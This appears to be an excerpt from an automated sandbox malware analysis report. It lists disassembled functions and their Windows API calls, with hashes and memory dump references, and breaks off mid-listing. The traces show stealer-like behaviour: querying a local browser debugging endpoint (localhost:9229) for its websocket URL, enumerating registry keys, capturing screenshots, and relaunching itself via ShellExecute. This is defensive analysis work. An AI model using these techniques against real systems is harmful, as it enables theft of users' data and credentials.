                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2367105040-0
                                • Opcode ID: fda2567214a027fc8272a54929315f91cd96d40f914d620fcba215501e5df9ce
                                • Instruction ID: 165a7056cfba96dc5e6e7c9e62fe35d5bc37d8551bf268e3ac76b99d76ea6b6c
                                • Opcode Fuzzy Hash: fda2567214a027fc8272a54929315f91cd96d40f914d620fcba215501e5df9ce
                                • Instruction Fuzzy Hash: CFB19EB1D112599FDB10EFA4DD84EEEB7B9EF88300F144969F90AE7241DA309E44CB91
                                Function 009BB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BB330
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB37E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB3A9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BB3B1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB3D9
                                • lstrlen.KERNEL32(009E4C50), ref: 009BB450
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB474
                                • lstrcat.KERNEL32(00000000,009E4C50), ref: 009BB480
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB4A9
                                • lstrlen.KERNEL32(00000000), ref: 009BB52D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB557
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BB55F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB587
                                • lstrlen.KERNEL32(009E4AD4), ref: 009BB5FE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB622
                                • lstrcat.KERNEL32(00000000,009E4AD4), ref: 009BB62E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB65E
                                • lstrlen.KERNEL32(?), ref: 009BB767
                                • lstrlen.KERNEL32(?), ref: 009BB776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BB79E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID:
                                • API String ID: 2500673778-0
                                • Opcode ID: 4cf845848922b73f549db7e05614a057494a940c801565792552c92bb9803df8
                                • Instruction ID: e69661d061f25cde6f7b4693da33a96028e59b71e5061308947043cbee0d2f47
                                • Opcode Fuzzy Hash: 4cf845848922b73f549db7e05614a057494a940c801565792552c92bb9803df8
                                • Instruction Fuzzy Hash: 1C025030A01205CFDB25DF55DA88BAEB7B9FF44325F198069E4099B3A1DBB5DC42CB81
                                Function 009D3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • RegOpenKeyExA.ADVAPI32(?,010CB318,00000000,00020019,?), ref: 009D37BD
                                • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 009D37F7
                                • wsprintfA.USER32 ref: 009D3822
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 009D3840
                                • RegCloseKey.ADVAPI32(?), ref: 009D384E
                                • RegCloseKey.ADVAPI32(?), ref: 009D3858
                                • RegQueryValueExA.ADVAPI32(?,010CEA20,00000000,000F003F,?,?), ref: 009D38A1
                                • lstrlen.KERNEL32(?), ref: 009D38B6
                                • RegQueryValueExA.ADVAPI32(?,010CEC30,00000000,000F003F,?,00000400), ref: 009D3927
                                • RegCloseKey.ADVAPI32(?), ref: 009D3972
                                • RegCloseKey.ADVAPI32(?), ref: 009D3989
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 72752819828df383a03224150e2e22d2db9790925511105edbb8bbcf1f32fbef
                                • Instruction ID: b9f86294173991816e6d3ac72f34a7544f2451eca5ba22ce09cb4ef2008a57aa
                                • Opcode Fuzzy Hash: 72752819828df383a03224150e2e22d2db9790925511105edbb8bbcf1f32fbef
                                • Instruction Fuzzy Hash: F1916D72900249DFCB10DFA4DD84AEEB7B9FB88311F14C56AE509AB351DB31AE45CB90
                                Function 009B90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(009DCFEC,00000001,00000000,00000000,00000000), ref: 009B90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009B90FC
                                • InternetCloseHandle.WININET(00000000), ref: 009B9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 009B9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009B9197
                                • InternetCloseHandle.WININET(00000000), ref: 009B91A2
                                • InternetCloseHandle.WININET(00000000), ref: 009B91A9
                                • strlen.MSVCRT ref: 009B91BA
                                • strlen.MSVCRT ref: 009B91ED
                                • strlen.MSVCRT ref: 009B922E
                                • strlen.MSVCRT ref: 009B924C
                                  • Part of subcall function 009B8980: std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 0b0e39d2561467a94082ef1fca795b6e922db498d89a3868657d70ec228b7d6e
                                • Instruction ID: e33d08467e909514c58cf287a0c7c93a6d107346005d4b8238ed8ec584763d09
                                • Opcode Fuzzy Hash: 0b0e39d2561467a94082ef1fca795b6e922db498d89a3868657d70ec228b7d6e
                                • Instruction Fuzzy Hash: 0E51D571A50245ABDB10DBA9DC85FDEF7BDDB88720F144069F504A7280DBB4E9448BA1
                                Function 009D1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 009D16A1
                                • lstrcpy.KERNEL32(00000000,010BA8E8), ref: 009D16CC
                                • lstrlen.KERNEL32(?), ref: 009D16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 009D1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D172A
                                • lstrlen.KERNEL32(010CE158), ref: 009D173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009D1762
                                • lstrcat.KERNEL32(00000000,010CE158), ref: 009D176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009D1792
                                • ShellExecuteEx.SHELL32(?), ref: 009D17CD
                                • ExitProcess.KERNEL32 ref: 009D1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: eaac4e35d83688a8c9b3957e71433dee30a89b95938710e88d06976e8f37af2a
                                • Instruction ID: e2cfdfc529ba377b56ac8ce9ce8f4674333d2cf97db77652bed4868c99e8d8a4
                                • Opcode Fuzzy Hash: eaac4e35d83688a8c9b3957e71433dee30a89b95938710e88d06976e8f37af2a
                                • Instruction Fuzzy Hash: 27514F71A01659ABDB11DFA4DE84A9EB7FDEF84300F548126E509E7351DF30AE05CB90
                                Function 009CEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009CF026
                                • lstrlen.KERNEL32(00000000), ref: 009CF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 009CF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 009CF081
                                • lstrlen.KERNEL32(?), ref: 009CF094
                                • lstrlen.KERNEL32(00000000), ref: 009CF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 009CF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 1402d16487eb6af9cd30e407485334937534e89acf732df9dbb897b4b5a760ae
                                • Instruction ID: f268e858af080aeb666073d4b394e29eabe07935c457f493b5ee4f225225c820
                                • Opcode Fuzzy Hash: 1402d16487eb6af9cd30e407485334937534e89acf732df9dbb897b4b5a760ae
                                • Instruction Fuzzy Hash: 9851A2319101419FCB21EF74DE59FAE77E9EF85720F05446DF84AAB252DA30DC018792
                                Function 009BA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(010C8B58,00BE9BD8,0000FFFF), ref: 009BA026
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BA053
                                • lstrlen.KERNEL32(00BE9BD8), ref: 009BA060
                                • lstrcpy.KERNEL32(00000000,00BE9BD8), ref: 009BA08A
                                • lstrlen.KERNEL32(009E4C4C), ref: 009BA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA0B2
                                • lstrcat.KERNEL32(00000000,009E4C4C), ref: 009BA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BA114
                                • SetEnvironmentVariableA.KERNEL32(010C8B58,00000000), ref: 009BA12F
                                • LoadLibraryA.KERNEL32(010B5010), ref: 009BA143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: ff932536fb8cdd3073b4db814a61d3630d6144bb46b99ea1aa27823608bf434f
                                • Instruction ID: b56c8f5dd169aa06436da26921e64e9ec22a133d70c4c7b8c789e410a167717c
                                • Opcode Fuzzy Hash: ff932536fb8cdd3073b4db814a61d3630d6144bb46b99ea1aa27823608bf434f
                                • Instruction Fuzzy Hash: 7091FB30600A409FD7319FA8DE88AE637B9EB94725F504558F4199F261EFB5DC40CBD2
                                Function 009CC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CC8A2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009CC8D1
                                • lstrlen.KERNEL32(00000000), ref: 009CC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009CC932
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009CC943
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 94cc1ec550cc4f056b701ba56158a1da37ed2d81bc5b3f9f732f47b9baeecbba
                                • Instruction ID: 663eb4e8290342e6082347a5bc5d66e12d7079218d44e9417f5f3600ef6ef2d7
                                • Opcode Fuzzy Hash: 94cc1ec550cc4f056b701ba56158a1da37ed2d81bc5b3f9f732f47b9baeecbba
                                • Instruction Fuzzy Hash: 6261B0B1D1121A9BDB10EFB58989FEE7BFCAF49340F144469E849E7241DB348D058B92
                                Function 009D41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,009D0CF0), ref: 009D4276
                                • GetDesktopWindow.USER32 ref: 009D4280
                                • GetWindowRect.USER32(00000000,?), ref: 009D428D
                                • SelectObject.GDI32(00000000,00000000), ref: 009D42BF
                                • GetHGlobalFromStream.COMBASE(009D0CF0,?), ref: 009D4336
                                • GlobalLock.KERNEL32(?), ref: 009D4340
                                • GlobalSize.KERNEL32(?), ref: 009D434D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: f6164f577f977ee28ae56c0b5789844103373f5aa5f16b5db63b2993603e7d48
                                • Instruction ID: bd9afbea9fa2589e188356344d46a3eb282a9ed5367e6b14355bdc9e22e334e2
                                • Opcode Fuzzy Hash: f6164f577f977ee28ae56c0b5789844103373f5aa5f16b5db63b2993603e7d48
                                • Instruction Fuzzy Hash: DD514E75910208AFDB10EFA4DD85AEEB7B9EF88310F104519F905E7251DB34AD058BA0
                                Function 009CDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
